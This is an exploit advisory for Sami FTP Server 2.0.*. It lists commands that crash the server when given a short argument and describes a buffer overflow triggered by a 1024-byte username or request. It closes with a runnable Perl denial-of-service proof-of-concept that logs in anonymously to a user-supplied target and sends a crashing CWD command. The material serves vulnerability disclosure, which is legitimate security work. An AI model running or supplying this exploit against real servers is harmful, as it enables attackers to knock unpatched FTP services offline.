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Sami FTP Server 2.0.* Multiple Remote Vulnerabilities



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# Sami FTP Server 2.0.* Multiple Remote Vulnerabilities
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# Bugs :
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# 1)Multiples remote denial of service 
(CWD,DELE,MKD,RMD,RETR,RNFR,RNTO,SIZE,STOR)
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# 2)Remote Buffer overflow (Logs)
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# Remote Denial of service:
# APPE A => server gone
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# CWD  AA => server gone
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# DELE AA ==> server gone
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# MKD AA ==> server gone
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# RMD AA ==> server gone
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# RETR AA ==> server gone
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# RNFR AA ==> server gone
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# RNTO AA ==> server gone
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# SIZE AA ==> server gone
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# STOR AA ==> server gone
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# Buffer Overflow :
# In the console management,you can view your logs,and set some stuff,when you 
open the console management a
# buffer overflow occurs ,if you have send previously a request(no matter the 
command) with 1024 bytes to the server.
# Also explorer.exe crash at the same time, 2 in 1 ;] The file is 
called(SamyFtp.binlog)note that this bug is
# quite critical , because it will occurs all the time,when you open the 
console management,and you dont need to be loggued
# you can simply send a username with 1024 bytes ...
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# @nolife: Life is always better when you dont know. things are clearer also 
smile
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# Denial of service Poc
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use Net::FTP;
(($target = $ARGV[0])) || die "usage:$0 <target> <port>";
my $user = "anonymous";
my $pass = "something";
print "Trying to connect to :$target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not 
connect";
print "Connected!\n";
$ftp->login($user, $pass);
$ftp->cwd("AA");
print "Poc Successfull the server should down now \n";
$ftp->quit;